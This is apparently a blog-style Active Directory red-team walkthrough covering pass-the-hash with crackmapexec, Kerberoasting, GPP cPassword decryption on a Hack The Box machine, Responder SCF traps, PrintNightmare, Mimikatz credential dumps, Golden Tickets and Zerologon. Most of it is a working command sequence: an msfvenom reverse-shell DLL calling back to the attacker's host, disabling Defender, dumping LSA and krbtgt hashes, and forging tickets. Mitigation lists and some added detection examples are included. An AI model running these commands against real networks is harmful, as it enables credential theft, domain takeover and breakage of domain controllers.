
Compromising AD - Part 3: Post Compromise Attacks

Post-Compromise Attacks


If we crack a password and/or dump the SAM hashes, we can leverage both for lateral movement in the network!

??? WTF

We use a tool called crackmapexec:

apt install crackmapexec


crackmapexec smb {ip} -u {username} -d {domain} -p {password} --sam

crackmapexec smb -u Thanos -d MARVEL -p 1nf1n1ty_Gauntl3t --sam


crackmapexec smb -u Spiderman -H hash69f420x31337u --local-auth --sam

	--local-auth passes locally
	--sam dumps the SAM file

So crackmapexec sprays the password across the whole subnet.

AND the ISSUE is that a lot of ADMINS reuse the SAME PASSWORD across machines (especially LOCAL accounts), so one cracked credential often works elsewhere.

Now, use smbexec, wmiexec, psexec or Metasploit to break in: domain/user:password@ip

secretsdump dumps the SAM hashes :) domain/user:password@ip

psexec with hashes: user@ip --hashes LMHASH:NTHASH



What are tokens?

Temporary keys that give you access to a system/network without having to provide credentials each time you access a file. Think of cookies for computers.

Two types





Goal: get a Ticket Granting Service (TGS) ticket and crack the server account's hash!

We have a Domain Controller, which is the Key Distribution Center (KDC), and an Application Server (MySQL, antivirus, etc.).

1. The victim user requests a Ticket Granting Ticket (TGT), providing their NTLM hash.

2. The Domain Controller sends the TGT back, encrypted with the Kerberos Ticket Granting Ticket account (krbtgt) hash.

Wait! How did we get the ticket? Because of the NTLM hash (meaning we have a username and password).

Remember the Application Server? It runs a service, which is registered under a Service Principal Name (SPN).

3. In order to access the service, we first have to request a Ticket Granting Service (TGS) ticket.

How do we request the TGS? We present the TGT.

4. The Domain Controller knows the server account's hash, so it ENCRYPTS the TGS with it and sends it to the victim.

Note that the KDC does not know whether we actually have access to the server; it hands out the TGS anyway!

To authenticate to that server, we present the TGS to the Application Server, which decrypts it with its own account hash and validates it (yes/no).

Well, we have a TGS encrypted with that hash, so we can CRACK THE HASH!

We use a tool from the Impacket suite:

python3 {domain}/{username}:{password} -dc-ip {ip} -request

It will return the hash.

Crack it with hashcat!

hashcat --help | grep Kerberos

13100	-	Kerberos 5 TGS

hashcat -m 13100 hash.txt rockyou.txt -O

-O enables the optimized kernels

We now have the password for the SERVICE account :)
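The detection side of the Kerberoasting flow above, as an added example (not code from these notes, Impacket or hashcat): it scores constructed Windows Security Event 4769 records, flagging accounts that request RC4-encrypted service tickets for many distinct service accounts in a short window. The field names, account names and sample values are assumptions made for this example.

```python
"""Detection side of the Kerberoasting flow above: an added example, not code
from these notes, Impacket or hashcat.  It scores constructed Windows Security
Event 4769 (TGS request) records; field names and sample values are assumed."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"            # etype 23, the ticket type hashcat mode 13100 cracks
NOT_ROASTABLE = {"krbtgt"}   # its key is random; never crackable in practice

# Constructed sample events, shaped like the fields of Event ID 4769.
SAMPLE_4769 = [
    {"time": "2024-01-01T10:00:00", "account": "thanos@MARVEL.local",
     "service": "SQLSvc", "etype": "0x17", "ip": "10.0.0.25"},
    {"time": "2024-01-01T10:00:30", "account": "thanos@MARVEL.local",
     "service": "HTTPSvc", "etype": "0x17", "ip": "10.0.0.25"},
    {"time": "2024-01-01T10:01:00", "account": "thanos@MARVEL.local",
     "service": "MSSQLSvc", "etype": "0x17", "ip": "10.0.0.25"},
    {"time": "2024-01-01T10:01:05", "account": "thanos@MARVEL.local",
     "service": "WS01$", "etype": "0x17", "ip": "10.0.0.25"},      # machine account
    {"time": "2024-01-01T10:00:00", "account": "spiderman@MARVEL.local",
     "service": "SQLSvc", "etype": "0x12", "ip": "10.0.0.31"},     # AES: normal use
    {"time": "2024-01-01T10:03:00", "account": "spiderman@MARVEL.local",
     "service": "HTTPSvc", "etype": "0x17", "ip": "10.0.0.31"},
    {"time": "2024-01-01T11:00:00", "account": "spiderman@MARVEL.local",
     "service": "MSSQLSvc", "etype": "0x17", "ip": "10.0.0.31"},   # outside window
]

def kerberoast_suspects(events, window=timedelta(minutes=5), threshold=3):
    """Map account -> sorted service names for each account that requested RC4
    tickets for >= threshold distinct non-machine services within one window."""
    by_account = defaultdict(list)
    for e in events:
        service = e["service"]
        if e["etype"].lower() != RC4_HMAC:
            continue                        # AES tickets are not the roast pattern
        if service.endswith("$") or service.lower() in NOT_ROASTABLE:
            continue                        # machine accounts: random 120-char passwords
        by_account[e["account"]].append((datetime.fromisoformat(e["time"]), service))

    suspects = {}
    for account, reqs in by_account.items():
        reqs.sort()                         # sliding window over request times
        for i, (start, _) in enumerate(reqs):
            distinct = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(distinct) >= threshold:
                suspects[account] = sorted(distinct)
                break
    return suspects
```

Tune `window` and `threshold` to the domain; the machine-account and krbtgt exclusions keep routine ticket traffic out of the alert.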



Group Policy Preferences Attack aka MS14-025

GPP allowed admins to create policies with embedded credentials.

These credentials were encrypted and stored in the "cPassword" attribute.

SYSVOL stores a Groups.xml file, and in that XML file you find the cPassword!

The key to this encryption was accidentally released.

Patched in MS14-025, but that doesn't undo previously created ones.
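An audit helper for the GPP issue just described, as an added example (not the page's or any project's code): it walks a copy of SYSVOL and reports every Group Policy Preference entry that still carries a cPassword attribute, without decoding the value. The file list, the attribute spellings and the sample Groups.xml are assumptions made for this example.

```python
"""Audit helper for the GPP/MS14-025 issue above: an added example, not the
page's or any project's code.  It walks a copy of SYSVOL and reports every
Group Policy Preference entry that still carries a cPassword attribute.
Presence is the finding; the value itself is not decoded."""
import os
import xml.etree.ElementTree as ET

# GPP file types that can embed a cPassword attribute (assumed list).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("username", "accountname", "runas")   # per-file spellings, lower-cased

# Constructed sample shaped like a SYSVOL Groups.xml; the cpassword value is a
# placeholder, not a real encrypted blob.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="svc_backup" changed="2020-01-01 00:00:00">
    <Properties action="U" userName="svc_backup"
                cpassword="CONSTRUCTED_PLACEHOLDER_BLOB" neverExpires="1"/>
  </User>
  <User name="helpdesk" changed="2020-01-02 00:00:00">
    <Properties action="U" userName="helpdesk" cpassword=""/>
  </User>
</Groups>"""

def find_cpasswords(xml_text, source="<inline>"):
    """Return one finding per GPP entry whose properties carry a non-empty
    cpassword attribute (attribute names are matched case-insensitively)."""
    findings = []
    for entry in ET.fromstring(xml_text):          # <User>, <Service>, <Task>, ...
        for node in entry.iter():
            attrs = {k.lower(): v for k, v in node.attrib.items()}
            if attrs.get("cpassword"):
                account = next((attrs[a] for a in ACCOUNT_ATTRS if a in attrs), "?")
                findings.append({"file": source, "entry": entry.get("name", "?"),
                                 "account": account, "changed": entry.get("changed", "?")})
    return findings

def scan_sysvol(root_dir):
    """Audit every GPP file below a mounted or copied SYSVOL directory."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
    return findings
```

Every finding is a policy to rewrite without the embedded credential and an account whose password should be rotated, since anyone who can read SYSVOL can recover it.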



Exploiting the "Active" Machine on Hack The Box

Active Machine Link:

nmap scan:

nmap -T5

Notice the open ports:

53    domain
88    kerberos-sec
389   ldap
445*  microsoft-ds
636   ldapssl

You may try the msf module smb_enum_gpp,

OR just manually grab the Groups.xml file!

Look at 445: the attack goes over SMB (which serves the SYSVOL folder).

Lets Go!

smbclient -L \\\\{ip}

Let's connect to the Replication share:

smbclient \\\\{ip}\\Replication

We got access to that machine!

Now change some settings:

prompt off

recurse on

Grab the files!

mget *

We see Groups.xml, and in it we have:


Now :) pro gamer move!

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ


But note that \\Replication doesn't always work, so try getting a domain user account!

Privesc that machine! active.htb/SVC_TGS:GPPstillStandingStrong2k18@{ip}

We see that nothing is writable :(

Let's try Kerberoasting (hint: SVC_TGS is a Ticket Granting Service account!) active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip {ip} -request

Whoa! We got a service ticket! Crack that hash!


:) active.htb/Administrator:{password}@{ip}

Get the flag!



After compromising a user, suppose the user has SHARE ACCESS: we can use that access to collect more hashes with Responder (potential privesc).

SCF Attack -

SCF and URL file attack against writeable share

Drop the following @something.scf file inside the share and start listening with Responder: responder -wrf --lm -v -I eth0


This attack also works with .url files and responder -I eth0 -v, say @test.url



Takes advantage of the Print Spooler service, which has functionality that lets users add printers and runs with SYSTEM privileges!

Because of this, any authenticated attacker can get CODE EXECUTION as a PRIVILEGED USER! XD


cube0x0 RCE -

calebstewart LPE -


Mitigation - just disable the damn service!

Stop-Service Spooler
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f


Before running the exploit you need to install the new version of Impacket:

pip3 uninstall impacket
git clone
cd impacket
python3 ./ install

Get that CVE Script



{ip} => Our Attacker's IP
{dcip} => Domain Controller's IP

Now we're going to run that script with a malicious .dll,

AND we're going to host that .dll:

python3 hackit.local/domain_user:{password}@{dcip} '\\{ip}\smb\addCube.dll'

python3 hackit.local/domain_user:{password}@{dcip} 'C:\addCube.dll'

Generate a payload using msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT=4444 -f dll > shell.dll

Now get a meterpreter session:


use multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LPORT 4444

set LHOST {ip}


Share the shell.dll file with Impacket's SMB server: share `pwd` -smb2support

`pwd` shares the entire current directory

So now we run:

python3 MARVEL.local/fcastle:Password1@{dcip} '\\{ip}\share\shell.dll'

We get a Windows Defender error!

Let's turn off Defender and try again! Now we successfully get shell access :)

	Server username: NT AUTHORITY\SYSTEM


TF? Windows Defender?

You can bypass AV; it's all because of the .dll.

Check this Article:


What’s that?



Special Notes:


Mimikatz Wiki:

Fire up cmd:


Here, privilege is a module and debug means it allows us to debug a process.

Expected Outcome:

Privilege '20' OK

Now we're going to attempt to dump some information out of memory.

Since we have debug privilege on, let's do some attacks!


Tip: we can pass the NTLM hash around.

In the wdigest section we can see:

Password : (null)

In Windows 7, the wdigest feature was on by default, and it stored passwords in clear text!

In later versions of Windows they patched it (nah, they just turned it off, mega big brain).

We can turn that feature back on using mimikatz!

We can also dump the SAM:


We can **dump LSA**:

The Local Security Authority is a protected subsystem of Windows authentication which authenticates logon sessions to the local computer.

lsadump::lsa /patch

NTDS.dit also contains credentials.



What is a Golden Ticket?

krbtgt account - the Kerberos Ticket Granting Ticket account, which is used to generate tickets.

If we have its hash, WE CAN GENERATE TICKETS!

With this, we can request access to any resource or system on the domain using the Ticket Granting Service!




lsadump::lsa /inject /name:krbtgt

Whoa, that's a lot of information! What do we actually need?

Now, moving further


kerberos::golden /User:Whatever /domain:{domain_name} /sid:{SID} /krbtgt:{NTLM_hash} /id:500 /ptt

/id:500 	500 is the ID of the Administrator account
/ptt 		Pass the Ticket

We generate a Golden Ticket here and then use Pass the Ticket to pass it along to the next session. That ticket lets us open a command prompt which has access to any computer on the domain!

So in our case:

kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-301214212-3920777931-1277971883 /krbtgt:11f843aafd22acfb29aef92f6e423994 /id:500 /ptt

After it completes successfully,


a command prompt opens up!


How to get a shell?

psexec.exe \\COMPUTERNAME cmd.exe


You can take one or more of these steps to protect against golden ticket attacks.

  1. Enforce a least privilege access model.

    • Limit user access to only what they need.
    • Limit the amount of admin accounts to only those who absolutely need it and ensure admin access is not simply added to their day-to-day user account.
  2. Implement multi-factor authentication (MFA) on all external authentication points, including VPN and OWA/O365.

  3. Don’t have RDP open to the internet. Seriously. Port numbers don’t matter. Get RDP behind a VPN, and implement MFA on it.

  4. Fake credentials can be injected into the LSASS cache, which would be tempting to hackers. Seeing these "honeycreds" used would clearly indicate an issue.

  5. Perform the reset of the krbtgt account (twice) in accordance with your password reset policies, or quarterly.

  6. If possible, consider running LSASS in its available protected mode.

  7. Enable Windows Defender Credential Guard on applicable systems (Windows 10 and Server 2016 and above). Do not use on domain controllers.


aka CVE-2020-1472

Attacking the Domain Controller, setting its machine account password to null and taking over the Domain Controller.

Issue: when we run the attack, **and if we do not restore it, we break it**



Check if vulnerable:

python3 COMPUTERNAME {dcip}

Now let's attack:

python3 COMPUTERNAME {dcip}

This changed the account password to an empty string.

How can we know that this is done?

Let's dump out the secrets of the machine: -just-dc {domain}/{dc}\$@{dcip}

$ => empty value -just-dc DOMAINNAME/COMPUTERNAME\$@{dcip}


Wait, how the hell do I restore this?

Copy the Administrator hash and log in with it: administrator@{dcip} -hashes adm1nha$h

Look for plain_password_hex

Now use the restore script:

python3 DOMAINNAME/COMPUTERNAME@COMPUTERNAME -target-ip {dcip} -hexpass {plain_password_hex}
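The detection side of the Zerologon procedure above, as an added example (not the page's code, nor any exploit or restore script): the Netlogon password reset is logged on the DC as Security Event 4742 with Subject ANONYMOUS LOGON and a changed Password Last Set attribute, and the function below also tracks whether the account was set again afterwards, which is the page's "if we do not restore it, we break it" concern. The field names, the sample records, the non-anonymous SIDs and the assumption that a later non-anonymous 4742 for the same account means it was restored are all constructed for this example.

```python
"""Detection side of the Zerologon (CVE-2020-1472) procedure above: an added
example, not the page's code or any exploit/restore script.  A Netlogon
password reset is logged on the DC as Security Event 4742 ("A computer account
was changed") with Subject ANONYMOUS LOGON (SID S-1-5-7) and a changed Password
Last Set attribute.  Field names, sample records and the assumption that a later
non-anonymous 4742 for the same account means it was restored are constructed."""

ANONYMOUS_LOGON_SID = "S-1-5-7"

# Constructed Event 4742 records in log order; "-" in password_last_set means
# that event did not change the attribute.  SIDs other than S-1-5-7 are made up.
SAMPLE_4742 = [
    {"subject": "HYDRA-DC$", "subject_sid": "S-1-5-21-1-2-3-1000", "target": "HYDRA-DC$",
     "password_last_set": "2024-01-01 09:00:00"},   # routine self-rotation
    {"subject": "ANONYMOUS LOGON", "subject_sid": ANONYMOUS_LOGON_SID,
     "target": "HYDRA-DC$", "password_last_set": "2024-01-01 10:02:11"},
    {"subject": "ANONYMOUS LOGON", "subject_sid": ANONYMOUS_LOGON_SID,
     "target": "WS01$", "password_last_set": "-"},   # anonymous, but no reset
    {"subject": "ANONYMOUS LOGON", "subject_sid": ANONYMOUS_LOGON_SID,
     "target": "SHIELD-DC$", "password_last_set": "2024-01-01 10:30:00"},
    {"subject": "SHIELD-DC$", "subject_sid": "S-1-5-21-1-2-3-1001", "target": "SHIELD-DC$",
     "password_last_set": "2024-01-01 10:45:00"},   # password set again afterwards
]

def zerologon_resets(events, dc_accounts):
    """Map each machine account whose password an anonymous caller reset to
    {"reset_at", "restored", "severity"}; a hit on a DC account is critical."""
    hits = {}
    for e in events:
        target = e["target"].upper()
        changed = e["password_last_set"] != "-"
        if e["subject_sid"] == ANONYMOUS_LOGON_SID and changed:
            hits[target] = {"reset_at": e["password_last_set"], "restored": False,
                            "severity": "critical" if target in dc_accounts else "high"}
        elif changed and target in hits:
            hits[target]["restored"] = True     # later legitimate set of the same account
    return hits
```

A DC account that stays unrestored is the broken state the page warns about; either way the event is the trigger to patch and to rotate the machine account password through the proper channel.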



  1. Patch. Apply the relevant Microsoft patch as quickly as possible!

  2. Proactively close patch gaps. Non-Windows machines are still somewhat unprotected from ZeroLogon. Search your network for non-Windows computer accounts with elevated privileges (e.g. domain replication privileges) as these could be used to launch a successful ZeroLogon attack even on patched domain controllers. (Falcon Zero Trust can provide you with a complete list of privileged accounts.)

  3. If you cannot patch for any reason:


#active-directory #cybersecurity #windows #red-teaming